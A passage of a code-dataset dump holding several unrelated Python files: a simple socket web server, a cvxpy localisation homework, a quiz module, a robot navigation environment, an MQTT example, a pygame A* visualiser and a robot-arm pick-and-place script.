i, e in enumerate(s.split(\" \"), 1):\n try:\n stack.append(e) if e.isdigit() else stack.append(_calc(int(stack.pop()), int(stack.pop()), e))\n except TypeError as e:\n print(e, \"At char number\", i)\n return None\n except:\n print(\"Problem at char number\", i)\n return None\n if len(stack) != 1 or type(stack[0]) not in (int):\n print(\"Invalid input\")\n return None\n\n return stack.pop()","sub_path":"ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":7504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"17070126","text":"#Python Code for the Web Server\r\n#import socket module\r\nfrom socket import * \r\n\r\nserverSocket = socket(AF_INET, SOCK_STREAM)\r\n#Prepare a sever socket\r\nserverPort = 15000\r\nserverSocket.bind(('',serverPort))\r\nserverSocket.listen(1);\r\nprint('Ready to serve...')\r\nrequest_count = 0\r\nwhile True:\r\n #Establish the connection\r\n connectionSocket, addr = serverSocket.accept(); \r\n try:\r\n request = connectionSocket.recv(2048) \r\n if (request):\r\n print (request)\r\n filename = request.decode('UTF-8').split()[1] \r\n f = open(filename[1:]) \r\n outputdata = f.read()\r\n # outputdata = bytes(outputdata,'UTF-8')\r\n #Send one HTTP header line into socket\r\n header = bytes(\"HTTP/1.1 200 OK\\r\\n\\r\\n\",'UTF-8')\r\n connectionSocket.send(header) \r\n \r\n #Send the content of the requested file to the client\r\n # for i in range(0, len(outputdata)):\r\n # connectionSocket.send(bytes(outputdata[i],'UTF-8'))\r\n connectionSocket.send(bytes(outputdata,'UTF-8'))\r\n request_count = request_count + 1\r\n \r\n #close the socket\r\n print(\"served \", request_count, \" requests.\")\r\n connectionSocket.close()\r\n except IOError: \r\n #Send response message for file not found\r\n header = bytes(\"HTTP/1.1 404 Not Found\\r\\n\\r\\n\",'UTF-8')\r\n connectionSocket.send(header) \r\n \r\n #Close client socket\r\n connectionSocket.close() \r\nserverSocket.close()\r\n","sub_path":"1_WebServer/WebServer.py","file_name":"WebServer.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"177380806","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 22 09:49:18 2018\n\n@author: josephhiggins\n\"\"\"\n\nimport cvxpy as cvx\nimport numpy as np\n\ndef sum_elem_product(A,B):\n return cvx.sum_entries(cvx.mul_elemwise(A, B))\n\ndef col_vec_3elem(a,b,c):\n return np.matrix([[a],[b],[c]])\n\n# Constraints will force Z to look like what its supposed to look like here\nZ = Semidef(3)\n\nsensor_location = [1000,1000]\n\nanchors = np.matrix([\n [ 1, 0],\n [-1, 0],\n [ 0, 2]\n])\n\nd = list(map(lambda a: np.linalg.norm(sensor_location - a), anchors))\n\nobjective = cvx.Minimize(0)\n\nv0 = col_vec_3elem(1,0,0)\nv1 = col_vec_3elem(0,1,0)\nv2 = col_vec_3elem(1,1,0)\n\na0 = col_vec_3elem(anchors[0,0],anchors[0,1],-1)\na1 = col_vec_3elem(anchors[1,0],anchors[1,1],-1)\na2 = col_vec_3elem(anchors[2,0],anchors[2,1],-1)\n\nconstraints = [\n sum_elem_product(v0*np.transpose(v0), Z) == 1,\n sum_elem_product(v1*np.transpose(v1), Z) == 1,\n sum_elem_product(v2*np.transpose(v2), Z) == 2,\n sum_elem_product(a0*np.transpose(a0), Z) == cvx.square(d[0]),\n sum_elem_product(a1*np.transpose(a1), Z) == cvx.square(d[1]),\n sum_elem_product(a2*np.transpose(a2), Z) == cvx.square(d[2])\n]\n\nprob = Problem(objective, constraints)\n\n# The optimal objective is returned by prob.solve().\nresult = prob.solve(solver = 'MOSEK')\n# The optimal value for x is stored in x.value.\nprint(Z[0,2].value)\nprint(Z[1,2].value)\n\n\n\n\n\n\n\n\n","sub_path":"HW2/Q9b.py","file_name":"Q9b.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"535557589","text":"import random\n\n\nclass QuizAnswer():\n def __init__(self, answer: str, correct: bool):\n self.answer = answer\n self.correct = correct\n\n def __str__(self):\n qa = self.answer\n if (self.correct):\n qa += \": Correct Answer\"\n return qa\n\n def __repr__(self):\n return self.__str__()\n\n\nclass QuizQuestion():\n question: str\n answers: list[QuizAnswer]\n\n def __init__(self, question: str):\n self.question = question\n self.answers = []\n\n def __str__(self):\n qs = \"\\n\\nQuestion: \" + self.question + \\\n \"\\n\\nAnswers: \" + str(self.answers)\n # for aq in self.answers:\n # qs += \"\\n\\n\"\n # qs += str(aq)\n return qs\n\n def __repr__(self):\n return self.__str__()\n\n def add_answer(self, answer: QuizAnswer):\n self.answers.append(answer)\n\n def correct_answer(self) -> str:\n letter = 'a'\n for qa in self.answers:\n if qa.correct:\n return letter\n letter = chr(ord(letter)+1)\n return letter\n\n\nclass Quiz():\n @staticmethod\n def quiz_list_from_config(config: dict) -> list[QuizQuestion]:\n questions: list[QuizQuestion] = []\n for question in config:\n qq = QuizQuestion(question)\n all = None\n for answer in config[question]:\n if answer[0] == '*':\n answer = answer[1:]\n if answer.startswith('#ALL'):\n all = QuizAnswer('All of the above', True)\n else:\n qa = QuizAnswer(answer, True)\n qq.add_answer(qa)\n elif answer.startswith('#ALL'):\n all = QuizAnswer('All of the above', False)\n else:\n qa = QuizAnswer(answer, False)\n qq.add_answer(qa)\n random.shuffle(qq.answers)\n if all:\n qq.add_answer(all)\n questions.append(qq)\n random.shuffle(questions)\n return questions\n\n # Prints question in a format for display\n @staticmethod\n def to_pretty_string(qq: QuizQuestion) -> str:\n pp = qq.question + \"\\n\"\n letter = 'a'\n for qa in qq.answers:\n pp += \"\\t\" + letter + \") \" + qa.answer + \"\\n\"\n letter = chr(ord(letter)+1)\n return pp\n","sub_path":"quiz.py","file_name":"quiz.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"460101056","text":"import cv2\nimport copy\nimport gym\nimport numpy as np\nfrom blox import AttrDict\nfrom gcp.planning.infra.envs.miniworld_env.base_miniworld_env import BaseMiniworldEnv\nfrom gcp.planning.infra.envs.miniworld_env.utils.multiroom2d_layout import define_layout, draw_layout_overview, \\\n default_texture_dir\nfrom gcp.planning.infra.envs.miniworld_env.utils.sampling_fcns import RoomSampler2d\nimport numbers\n\n\ndef fcn_apply(fcn, arg):\n return lambda: fcn(arg())\n\n\nclass Multiroom3dEnv(BaseMiniworldEnv):\n def __init__(self, hp, reset_state=None, no_env=False, crop_window=None):\n self._hp = self._default_hparams()\n for name, value in hp.items():\n print('setting param {} to value {}'.format(name, value))\n self._hp.set_hparam(name, value)\n super().__init__(self._hp)\n\n self._texture_dir = default_texture_dir()\n self._rooms_per_side = int(np.sqrt(self._hp.n_rooms))\n self._layout = define_layout(self._rooms_per_side, self._texture_dir)\n self._topdown_render_scale = 256 # table_size * scale = px size of output render img\n self._static_img_topdown = draw_layout_overview(self._rooms_per_side,\n self._topdown_render_scale,\n texture_dir=self._texture_dir)\n self._crop_window = crop_window\n if crop_window is not None:\n # top-down rendering will get cropped -> pad static background\n padded_bg = np.zeros((self._static_img_topdown.shape[0] + 2 * crop_window,\n self._static_img_topdown.shape[1] + 2 * crop_window, 3), dtype=self._static_img_topdown.dtype)\n padded_bg[crop_window:-crop_window, crop_window:-crop_window] = self._static_img_topdown\n self._static_img_topdown = padded_bg\n\n self._adim, self._sdim = 2, 3\n if not no_env:\n import gym_miniworld # keep! important for env registration\n self.env = gym.make(\"MiniWorld-Multiroom3d-v0\",\n obs_height=self._hp.obs_height,\n obs_width=self._hp.obs_width,\n rooms_per_side=self._rooms_per_side,\n doors=self._layout.doors,\n heading_smoothing=self._hp.heading_smoothing,\n layout_params=AttrDict(room_size=self._layout.room_size,\n door_size=self._layout.door_size,\n textures=self._layout.textures))\n\n # Define the sample_*_state method by looking up the function with the corresponding name\n self.state_sampler = RoomSampler2d(self._rooms_per_side)\n self.current_pos = None\n self.goal_pos = None\n self.prm_policy = None # used to compute shortest distance between pos and goal\n\n def _default_hparams(self):\n default_dict = {\n 'obs_height': 300,\n 'obs_width': 400,\n 'goal_pos': None,\n 'init_pos': None,\n 'n_rooms': 9,\n 'heading_smoothing': 0.2, # how much of new angle is taken into average\n }\n parent_params = super()._default_hparams()\n for k in default_dict.keys():\n parent_params.add_hparam(k, default_dict[k])\n return parent_params\n\n def reset(self, reset_state):\n super().reset()\n\n if reset_state is None:\n start_pos = self.env.mj2mw(self.state_sampler.sample(self._hp.init_pos))\n start_angle = 2 * np.pi * np.random.rand()\n goal_pos = self.env.mj2mw(self.state_sampler.sample(self._hp.goal_pos))\n else:\n start_pos = reset_state[:2]\n start_angle = reset_state[2]\n goal_pos = reset_state[-2:]\n\n reset_state = AttrDict(start_pos=start_pos,\n start_angle=start_angle,\n goal=goal_pos)\n\n img_obs = self.env.reset(reset_state)\n self.goal_pos = goal_pos\n qpos_full = np.concatenate((start_pos, np.array([start_angle])))\n\n obs = AttrDict(images=np.expand_dims(img_obs, axis=0), # add camera dimension\n qpos_full=qpos_full,\n goal=goal_pos,\n env_done=False,\n state=np.concatenate((qpos_full, goal_pos)),\n topdown_image=self.render_pos_top_down(qpos_full, self.goal_pos)\n )\n self._post_step(start_pos)\n self._initial_shortest_dist = self.comp_shortest_dist(start_pos, goal_pos)\n return obs, reset_state\n\n def get_reset_from_obs(self, obs_dict):\n return obs_dict['state'][0]\n\n def get_goal_from_obs(self, obs_dict):\n self.goal = obs_dict['goal'][-1]\n return self.goal\n\n def step(self, action):\n img_obs, reward, done, agent_pos = self.env.step(action)\n obs = AttrDict(images=np.expand_dims(img_obs, axis=0), # add camera dimension\n qpos_full=agent_pos,\n goal=self.goal_pos,\n env_done=done,\n state=np.concatenate((agent_pos, self.goal_pos)),\n topdown_image=self.render_pos_top_down(agent_pos, self.goal_pos)\n )\n self._post_step(agent_pos)\n return obs\n\n def _post_step(self, agent_pos):\n self.current_pos = agent_pos\n self.add_goal_dist(self.comp_shortest_dist(self.current_pos[:2], self.goal_pos))\n self._full_traj.append(agent_pos)\n\n def eval(self):\n self._final_shortest_dist = self.comp_shortest_dist(self.current_pos[:2], self.goal_pos)\n return super().eval()\n\n def comp_shortest_dist(self, p1, p2):\n \"\"\"Uses PRM to get the shortest distance between two points within the maze.\"\"\"\n if self.prm_policy is None:\n from gcp.planning.infra.policy.prm_policy.prm_policy import PrmPolicy\n self.prm_policy = PrmPolicy(None, AttrDict(n_samples_per_room=200), None, None, **self.env_policy_params())\n dist, _ = self.prm_policy.compute_shortest_path(p1, p2)\n return dist\n\n def env_policy_params(self):\n def transform_plan(state_plan, action_plan):\n state_plan = self.env.mj2mw(state_plan)\n action_plan = state_plan[:, 1:] - state_plan[:, :-1]\n return state_plan, action_plan\n\n conversion_fcns = AttrDict(transform_plan=transform_plan,\n env2prm=self.env.mw2mj,\n prm2env=self.env.mj2mw)\n return {'conversion_fcns': conversion_fcns, 'n_rooms': self._hp.n_rooms}\n\n def render_top_down(self, traj, background=None, goal=None, line_thickness=4, color=(1.0, 0, 0), mark_pts=False):\n \"\"\"Renders a state trajectory in a top-down view.\"\"\"\n if isinstance(color[0], numbers.Number):\n color = [color] * (traj.shape[0] - 1)\n \n img = self._static_img_topdown.copy() if background is None else background.copy()\n traj = traj.copy() # very important!!!\n if goal is not None:\n goal = goal.copy()\n if traj.shape[1] == 5 or traj.shape[1] == 2: goal = goal[:2]; goal[1] *= -1\n if traj.max() > 1.0 or traj.min() < -1.0: goal = goal / 27.0\n goal = goal + 0.5 * self._layout.table_size\n if traj.shape[1] == 5 or traj.shape[1] == 2: traj = traj[:, :2]; traj[:, 1] *= -1\n if traj.max() > 1.0 or traj.min() < -1.0: traj = traj / 27.0 # scale from miniworld env to [-1...1]\n traj = traj + 0.5 * self._layout.table_size\n for i in range(traj.shape[0] - 1):\n cv2.line(img, (int(traj[i, 0] * self._topdown_render_scale),\n img.shape[0] - int(traj[i, 1] * self._topdown_render_scale)),\n (int(traj[i+1, 0] * self._topdown_render_scale),\n img.shape[0] - int(traj[i+1, 1] * self._topdown_render_scale)),\n color[i], line_thickness)\n if mark_pts and i > 0 and i < (traj.shape[0] - 2):\n cv2.line(img, (int(traj[i, 0] * self._topdown_render_scale),\n img.shape[0] - int(traj[i, 1] * self._topdown_render_scale)),\n (int(traj[i, 0] * self._topdown_render_scale),\n img.shape[0] - int(traj[i, 1] * self._topdown_render_scale)),\n (1.0, 0, 0), int(3*line_thickness))\n\n # print start+end position\n img = self.render_pos_top_down(traj[0], traj[-1], background=img, mirror_scale=False)\n if goal is not None:\n img = self.render_pos_top_down(traj[0], goal, background=img, mirror_scale=False, large_goal=True)\n return img\n\n def render_pos_top_down(self,\n current_pose,\n goal_pos,\n background=None,\n mirror_scale=True,\n large_goal=False):\n \"\"\"Renders a state trajectory in a top-down view.\"\"\"\n img = self._static_img_topdown.copy() if background is None else background.copy()\n\n def convert_sim2topdown(pos, img_shape):\n pos = pos.copy() # very important !!!!!\n if mirror_scale:\n pos[1] *= -1\n pos = pos / 27.0 # scale from miniworld env to [-1...1]\n pos = pos + 0.5 * self._layout.table_size\n return (int(pos[0] * self._topdown_render_scale), img_shape[0] - int(pos[1] * self._topdown_render_scale))\n\n curr_pos = convert_sim2topdown(current_pose, img.shape)\n goal_pos = convert_sim2topdown(goal_pos, img.shape)\n\n if self._crop_window is not None:\n # we need to correct for the too large size of img.shape above, therefore -2*self._crop_window\n curr_pos = (curr_pos[0] + self._crop_window, curr_pos[1] + self._crop_window - 2*self._crop_window)\n goal_pos = (goal_pos[0] + self._crop_window, goal_pos[1] + self._crop_window - 2*self._crop_window)\n\n cv2.line(img, curr_pos, curr_pos, (0.0, 0, 1.0), 10)\n cv2.line(img, goal_pos, goal_pos, (0.0, 1.0, 0), 10 if not large_goal else 20)\n\n if self._crop_window is not None:\n # catch rounding errors\n curr_pos = (max(self._crop_window, curr_pos[0]), max(self._crop_window, curr_pos[1]))\n lower, upper = np.asarray(curr_pos) - self._crop_window, np.asarray(curr_pos) + self._crop_window\n img = img[lower[1]:upper[1], lower[0]:upper[0]]\n\n return img\n\n @property\n def adim(self):\n return self._adim\n\n @property\n def sdim(self):\n return self._sdim\n\n\nclass TopdownMultiroom3dEnv(Multiroom3dEnv):\n \"\"\"Image observations are rendered topdown in a window around the agent.\"\"\"\n def __init__(self, hp, reset_state=None, no_env=False, crop_window=None):\n assert \"crop_window\" in hp # need to specify the crop window for topdown rendering\n temp_hp = copy.deepcopy(hp)\n crop_window = temp_hp.pop(\"crop_window\")\n super().__init__(temp_hp, reset_state, no_env, crop_window=crop_window)\n\n def reset(self, reset_state):\n obs, reset_state = super().reset(reset_state)\n obs.images = np.asarray(255*obs.topdown_image.copy(), dtype=np.uint8)[None]\n return obs, reset_state\n\n def step(self, action):\n obs = super().step(action)\n obs.images = np.asarray(255*obs.topdown_image.copy(), dtype=np.uint8)[None]\n return obs\n\n","sub_path":"gcp/planning/infra/envs/miniworld_env/multiroom3d/multiroom3d_env.py","file_name":"multiroom3d_env.py","file_ext":"py","file_size_in_byte":11794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"15466657","text":"#########################################\n# MqttBroker.py\n# more info @: http://myrobotlab.org/service/MqttBroker\n#########################################\nfrom time import sleep\n\n# start service\nmqtt = runtime.start(\"mqtt\", \"Mqtt\")\nbroker = runtime.start(\"broker\", \"MqttBroker\")\npython = runtime.start(\"python\", \"Mqtt\")\n\n# start the local mqtt broker on standard port\nbroker.listen()\n\ntopic = \"echoTopic\"\n\nmqtt.connect(\"tcp://localhost:1883\")\n# authentification mqtt.connect(broker,\"guest\",\"guest\")\n \nmqtt.subscribe(topic)\n\n# qos = 1 # At most once (0), At least once (1), Exactly once (2).\nmqtt.publish(\"echoTopic\", \"hello myrobotlab world\")\npython.subscribe(\"mqtt\", \"publishMqttMsg\")\n# or mqtt.addListener(\"publishMqttMsgString\", \"python\")\n \n# publishMqttMsg --> onMqttMsg(msg)\ndef onMqttMsg(msg):\n print (\"message : \", msg)\n\n\nfor i in range(30):\n mqtt.publish(topic, \"hello myrobotlab ! \" + str(i))\n sleep(0.5)\n","sub_path":"src/main/resources/resource/MqttBroker/MqttBroker.py","file_name":"MqttBroker.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"173796153","text":"import pygame\nimport numpy as np\nfrom a_star import Grid, Node\n\n\ndef compute_path(grid, start, finish, show_try_path=False):\n graph_grid = Grid(get_numpy_grid_from_list_grid(grid))\n path_trace = graph_grid.a_star(Node(start), Node(finish))\n\n if show_try_path:\n for key in path_trace.keys():\n grid[key[0]][key[1]] = 5\n\n if finish not in path_trace:\n return grid\n\n current_node = path_trace[finish].parent\n\n while current_node != start:\n grid[current_node[0]][current_node[1]] = 4\n current_node = path_trace[current_node].parent\n\n return grid\n\n\ndef set_screen(window_size, grid_size, margin):\n grid_tile_width = ((window_size[0] - margin) / grid_size[0]) - margin\n grid_tile_height = ((window_size[1] - margin) / grid_size[1]) - margin\n screen = pygame.display.set_mode(window_size, pygame.HWSURFACE |\n pygame.DOUBLEBUF | pygame.RESIZABLE)\n\n return screen, grid_tile_width, grid_tile_height\n\n\ndef get_numpy_grid_from_list_grid(list_grid):\n return np.array(map(lambda column: map(lambda i: np.inf if i == 1 else 1,\n column), list_grid))\n\n\ndef main():\n # colors\n white = (255, 255, 255)\n black = (0, 0, 0)\n red = (255, 0, 0)\n green = (0, 255, 0)\n blue = (0, 0, 255)\n\n # board colors\n background_color = black\n tile_color_filled = black\n tile_color_blank = white\n start_color = red\n finish_color = green\n path_color = blue\n try_color = (200, 200, 200)\n\n margin = 1\n window_size = (1000, 1000)\n grid_size = (100, 100)\n\n screen, grid_tile_width, grid_tile_height = set_screen(window_size,\n grid_size, margin)\n\n grid = [[0] * grid_size[1] for i in xrange(grid_size[0])]\n changes_grid = [[False] * grid_size[1] for i in xrange(grid_size[0])]\n done = False\n mouse_pressed = False\n screen_modf = True\n user_set_start = False\n start_tile = None\n end_tile = None\n\n pygame.display.set_caption(\"A* Testing\")\n clock = pygame.time.Clock()\n\n while not done:\n events = pygame.event.get()\n for event in events:\n if event.type == pygame.QUIT:\n done = True\n\n elif event.type == pygame.VIDEORESIZE:\n mouse_pressed = False\n window_size = event.dict['size']\n screen, grid_tile_width, grid_tile_height = \\\n set_screen(window_size, grid_size, margin)\n screen_modf = True\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_r:\n if (start_tile and end_tile) is not None:\n grid = compute_path(grid, start_tile, end_tile, True)\n screen_modf = True\n if event.key == pygame.K_c:\n grid = [[0] * grid_size[1] for i in xrange(grid_size[0])]\n changes_grid = [[False] * grid_size[1] for i in\n xrange(grid_size[0])]\n done = False\n mouse_pressed = False\n screen_modf = True\n user_set_start = False\n start_tile = None\n end_tile = None\n if ((event.key == pygame.K_s) and\n ((start_tile and end_tile) is not None)):\n grid_object = Grid(get_numpy_grid_from_list_grid(grid))\n grid_object.save(\"grid\", \"../tests/boards/\",\n start_tile, end_tile)\n\n if event.type == pygame.MOUSEMOTION and mouse_pressed:\n pos = pygame.mouse.get_pos()\n y = pos[0] // (grid_tile_width + margin)\n x = pos[1] // (grid_tile_height + margin)\n if x >= grid_size[0] or y >= grid_size[1]:\n continue\n if not changes_grid[x][y]:\n changes_grid[x][y] = True\n if (x, y) == start_tile:\n start_tile = None\n if (x, y) == end_tile:\n end_tile = None\n grid[x][y] = int(not grid[x][y])\n screen_modf = True\n\n if event.type == pygame.MOUSEBUTTONDOWN:\n if pygame.mouse.get_pressed()[2]:\n pos = pygame.mouse.get_pos()\n y = pos[0] // (grid_tile_width + margin)\n x = pos[1] // (grid_tile_height + margin)\n if x >= grid_size[0] or y >= grid_size[1]:\n continue\n if not changes_grid[x][y]:\n if user_set_start:\n if end_tile is not None:\n grid[end_tile[0]][end_tile[1]] = 0\n grid[x][y] = 3\n end_tile = (x, y)\n if end_tile == start_tile:\n start_tile = None\n else:\n if start_tile is not None:\n grid[start_tile[0]][start_tile[1]] = 0\n grid[x][y] = 2\n start_tile = (x, y)\n if end_tile == start_tile:\n end_tile = None\n user_set_start = not user_set_start\n screen_modf = True\n else:\n mouse_pressed = True\n\n if event.type == pygame.MOUSEBUTTONUP:\n mouse_pressed = False\n changes_grid = [[False] * grid_size[1] for i in\n xrange(grid_size[0])]\n\n if screen_modf:\n screen.fill(background_color)\n for x, row in enumerate(grid):\n for y, v in enumerate(row):\n color = [tile_color_blank, tile_color_filled, start_color,\n finish_color, path_color, try_color][v]\n pygame.draw.rect(screen, color,\n [(margin + grid_tile_width) * y + margin,\n (margin + grid_tile_height) * x + margin,\n grid_tile_width, grid_tile_height])\n\n pygame.display.flip()\n screen_modf = False\n clock.tick(60)\n\n pygame.quit()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"AStarRoute/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":6538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"639571291","text":"import numpy as np\nimport img_processing as ip\nimport rvm1_ik as ik\nimport matplotlib.pyplot as plt\nimport cv2\n\nfrom scipy.spatial import ConvexHull, convex_hull_plot_2d\n\npickup_height = 21\npyramid_index = 0\n\npyramid_hgap = 6\npyramid_layer_height = 43\ncontainer_raidus = 17.5\n \nremoved_circles = []\npresent_circles = [0, 1, 2, 3, 4, 5]\nworld_circles, image_circles, processed_snap = ip.img_process('calibrate.jpg', 'snap.jpg')\n\ndef get_nearest_circle(circle_index):\n\n cost = 9999999999\n nearest_circle_index = circle_index\n\n x = world_circles[circle_index][0]\n y = world_circles[circle_index][1]\n\n for i in range(len(world_circles)):\n\n if (i == circle_index):\n continue\n\n test_x = world_circles[i][0]\n test_y = world_circles[i][1]\n\n temp_cost = np.sqrt((x - test_x) ** 2 + (y - test_y) ** 2)\n\n if(temp_cost <= cost):\n cost = temp_cost\n nearest_circle_index = i\n\n return nearest_circle_index\n\ndef get_cost(index):\n\n cost = 0\n\n for i in range(len(world_circles)):\n cost += (world_circles[index][0] - world_circles[i][0]) ** 2 + (world_circles[index][1] - world_circles[i][1]) ** 2\n \n #print(cost)\n\n return cost\n\ndef convex_hull():\n\n centers = []\n\n for i in range(len(world_circles)):\n\n if not i in present_circles:\n continue\n \n centers.append([world_circles[i][0], world_circles[i][1]])\n\n max_cost = 0\n max_cost_index = 0\n\n if (len(present_circles) <= 1):\n return 0\n elif (len(present_circles) <= 2):\n if get_cost(present_circles[0]) > get_cost(present_circles[1]):\n return 0\n else:\n return 1\n\n hull = ConvexHull(centers)\n\n for i in range(len(hull.vertices)):\n #print(hull.vertices[i])\n #print(centers[hull.vertices[i]][0], centers[hull.vertices[i]][1])\n\n #_, phi = ik.inverse_kinematics(world_circles[hull.vertices[i]][0], world_circles[hull.vertices[i]][1], pickup_height)\n #phi = np.rad2deg(phi)\n \n #if phi != -90.0:\n # print(phi)\n # cost = 0\n #else:\n cost = get_cost(present_circles[hull.vertices[i]])\n\n if(cost > max_cost):\n max_cost = cost\n max_cost_index = hull.vertices[i]\n \n #print(max_cost_index)\n\n return max_cost_index\n\ndef write_commands(joint_variables, prev_joint_variables):\n\n delta_q1 = joint_variables[0] - prev_joint_variables[0]\n delta_q2 = joint_variables[1] - prev_joint_variables[1]\n delta_q3 = joint_variables[2] - prev_joint_variables[2]\n delta_q4 = joint_variables[3] - prev_joint_variables[3]\n delta_q5 = joint_variables[4] - prev_joint_variables[4]\n\n command_q1 = -np.round(float(np.rad2deg(delta_q1)), 1)\n command_q2 = np.round(float(np.rad2deg(delta_q2)), 1)\n command_q3 = np.round(float(np.rad2deg(delta_q3)), 1)\n command_q4 = np.round(float(np.rad2deg(delta_q4)), 1)\n command_q5 = np.round(float(np.rad2deg(delta_q5)), 1)\n\n f.write(\"MJ {},{},{},{},{}\\n\".format(command_q1, command_q2, command_q3, command_q4, command_q5))\n\nprint(\"\\nImage Circles:\\n{}\\n\".format(image_circles))\nprint(\"World Circles:\\n{}\".format(world_circles))\n\npyramid_coordinates = [[380, -(pyramid_hgap + (2 * container_raidus)), pickup_height],\n [380, 0, pickup_height],\n [380, pyramid_hgap + (2 * container_raidus), pickup_height],\n [380, -(pyramid_hgap + (2 * container_raidus)) / 2, pickup_height + pyramid_layer_height],\n [380, (pyramid_hgap + (2 * container_raidus)) / 2, pickup_height + pyramid_layer_height],\n [380, 0, pickup_height + pyramid_layer_height * 2]]\n\nfor i, circle in enumerate(world_circles):\n\n index = convex_hull()\n removed_circles.append(present_circles.pop(index))\n\nprint(\"\\nRemoved Circles: \", removed_circles)\nprint(\"Present Circles:\", present_circles)\n\nf = open(\"rvm1_project3.txt\", \"w+\")\nf.write(\"NT\\nOG\\nMJ 0,0,0,0,-8\\nTI 10\\n\")\n\nprev_joint_variables = [0.0, 0.0, 0.0, 0.0, 0.0]\n\n#world_circles[1] = [420, 150, 17]\n\nheight_multiplier = 3.5\n\niteration = 0\n\nordered_circles = []\nunreachable_circles = []\n\nfor i in removed_circles:\n\n joint_variables, phi = ik.inverse_kinematics(world_circles[i][0], world_circles[i][1], pickup_height)\n phi = np.rad2deg(phi)\n\n if phi == -90.0:\n ordered_circles.append(i)\n \n if phi != -90.0:\n unreachable_circles.append(i)\n\nordered_circles.extend(unreachable_circles)\n\nfor i in ordered_circles:\n\n # Place gripper above object\n joint_variables, phi = ik.inverse_kinematics(world_circles[i][0], world_circles[i][1], height_multiplier * pickup_height)\n phi = np.rad2deg(phi)\n\n if phi == -90.0:\n nearest_circle_index = get_nearest_circle(i)\n joint_variables[4] = ik.gripper_orientation([world_circles[i][0], world_circles[i][1]], [world_circles[nearest_circle_index][0], world_circles[nearest_circle_index][1]])\n\n print(\"\\nPlace gripper above object.\")\n print(\"Joint Variables: \\n{}\".format(np.rad2deg(joint_variables)))\n print(\"phi: {}\".format(phi))\n ik.compute_coordinates(joint_variables)\n\n processed_snap = ip.draw_arrowed_line(processed_snap, (image_circles[i][0], image_circles[i][1]), image_circles[i][2], joint_variables[4])\n\n write_commands(joint_variables, prev_joint_variables)\n prev_joint_variables = joint_variables.copy()\n\n # Pickup object\n joint_variables, phi = ik.inverse_kinematics(world_circles[i][0], world_circles[i][1], pickup_height)\n phi = np.rad2deg(phi)\n pickup_phi = phi\n\n if phi == -90.0:\n nearest_circle_index = get_nearest_circle(i)\n joint_variables[4] = ik.gripper_orientation([world_circles[i][0], world_circles[i][1]], [world_circles[nearest_circle_index][0], world_circles[nearest_circle_index][1]])\n\n print(\"\\nPick-up object.\")\n print(\"Joint Variables: \\n{}\".format(np.rad2deg(joint_variables)))\n print(\"phi: {}\".format(phi))\n ik.compute_coordinates(joint_variables)\n\n write_commands(joint_variables, prev_joint_variables)\n prev_joint_variables = joint_variables.copy()\n f.write(\"GC\\n\")\n\n # Raise gripper\n joint_variables, phi = ik.inverse_kinematics(world_circles[i][0], world_circles[i][1], height_multiplier * pickup_height, pickup_phi)\n phi = np.rad2deg(phi)\n\n print(\"\\nRaise gripper with object.\")\n print(\"Joint Variables: \\n{}\".format(np.rad2deg(joint_variables)))\n print(\"phi: {}\".format(phi))\n ik.compute_coordinates(joint_variables)\n\n write_commands(joint_variables, prev_joint_variables)\n prev_joint_variables = joint_variables.copy()\n\n # Re-place object to properly grip\n if pickup_phi != -90.0:\n\n joint_variables, phi = ik.inverse_kinematics(280, 250, height_multiplier * pickup_height, pickup_phi)\n phi = np.rad2deg(phi)\n\n print(\"\\nPlace gripper with object above stopover point.\")\n print(\"Joint Variables: \\n{}\".format(np.rad2deg(joint_variables)))\n print(\"phi: {}\".format(pickup_phi))\n ik.compute_coordinates(joint_variables)\n\n write_commands(joint_variables, prev_joint_variables)\n prev_joint_variables = joint_variables.copy()\n\n joint_variables, phi = ik.inverse_kinematics(280, 250, pickup_height, pickup_phi)\n phi = np.rad2deg(phi)\n\n print(\"\\nPlace object on stopover point.\")\n print(\"Joint Variables: \\n{}\".format(np.rad2deg(joint_variables)))\n print(\"phi: {}\".format(pickup_phi))\n ik.compute_coordinates(joint_variables)\n\n write_commands(joint_variables, prev_joint_variables)\n prev_joint_variables = joint_variables.copy()\n f.write(\"GO\\n\")\n\n joint_variables, phi = ik.inverse_kinematics(280, 250, pickup_height)\n phi = np.rad2deg(phi)\n\n print(\"\\nFix grip on object.\")\n print(\"Joint Variables: \\n{}\".format(np.rad2deg(joint_variables)))\n print(\"phi: {}\".format(phi))\n ik.compute_coordinates(joint_variables)\n\n write_commands(joint_variables, prev_joint_variables)\n prev_joint_variables = joint_variables.copy()\n f.write(\"GC\\n\")\n\n # Place gripper above pyramid position\n joint_variables, phi = ik.inverse_kinematics(pyramid_coordinates[pyramid_index][0], pyramid_coordinates[pyramid_index][1], 20 + pyramid_coordinates[pyramid_index][2])\n phi = np.rad2deg(phi)\n joint_variables[4] = np.deg2rad(90)\n\n print(\"\\nPlace gripper above pyramid position.\")\n print(\"Joint Variables: \\n{}\".format(np.rad2deg(joint_variables)))\n print(\"phi: {}\".format(phi))\n ik.compute_coordinates(joint_variables)\n\n write_commands(joint_variables, prev_joint_variables)\n prev_joint_variables = joint_variables.copy()\n\n # Place object\n joint_variables, phi = ik.inverse_kinematics(pyramid_coordinates[pyramid_index][0], pyramid_coordinates[pyramid_index][1], pyramid_coordinates[pyramid_index][2])\n phi = np.rad2deg(phi)\n joint_variables[4] = np.deg2rad(90)\n\n print(\"\\nPlace object on pyramid.\")\n print(\"Joint Variables: 